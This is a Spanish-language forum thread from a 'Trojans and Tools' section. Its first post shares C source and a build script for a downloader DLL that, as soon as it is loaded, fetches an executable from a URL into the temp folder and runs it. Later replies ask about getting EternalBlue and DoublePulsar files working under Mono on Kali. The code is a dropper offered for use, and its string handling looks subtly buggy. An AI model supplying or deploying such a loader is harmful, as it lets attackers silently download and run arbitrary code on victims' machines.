Blau escribió: 16 May 2017, 20:38 A petición de un compañero por el grupo de Skype, os dejo el código para un downloader DLL en C. Debéis instalar [Enlace externo eliminado para invitados] (o cualquier compilador basado en MinGW).

Downloader.c
#include <windows.h>
BOOL __cdecl __declspec(dllexport) Download() {
	char* szUrl = "https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe";
	char* szPath = "aaaaa.exe";
	
	char *szTempPath = malloc(256);
	DWORD dwPathLength = GetTempPathA(256, szTempPath);
	
	strncat(szTempPath, szPath, dwPathLength);
	szTempPath[dwPathLength + strlen(szPath) + 1] = 0;

	HRESULT hRes = URLDownloadToFileA(NULL, szUrl, szTempPath, 0, NULL); 
	if(hRes == S_OK) {
		ShellExecuteA(NULL, "open", szTempPath, NULL, NULL, SW_SHOW);
	}
	
    return TRUE;
} 

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
    if(fdwReason != DLL_PROCESS_ATTACH) return TRUE;
    return Download();
} 
Para compilar normalmente me hago un archivo .bat con esta estructura:
@ECHO OFF
SET InputFile=Downloader
SET Parameters=-w -Os -s -fpermissive -shared -lurlmon

del %InputFile%32.dll										
gcc %InputFile%.c %Parameters% -m32 -o %InputFile%32.dll	

del %InputFile%64.dll										
gcc %InputFile%.c %Parameters% -m64 -o %InputFile%64.dll
Hola, soy nuevo aquí y me gustaría ponerme en contacto contigo.
Lo ejecuto en Kali con MONO pero a la hora de dar en "start" me lanza un error que dice que no se encuentra el archivo doublepulsar ni eternalblue... ya revise el codigo fuente y hace la referencia correcta a la carpeta bin ... no encuentro el problema, alguien puede ayudarme???
No lo he probado en Linux pero supongo que habria que modificar el código para correr los ejecutables bajo wine.
Responder

Volver a “Troyanos y Herramientas”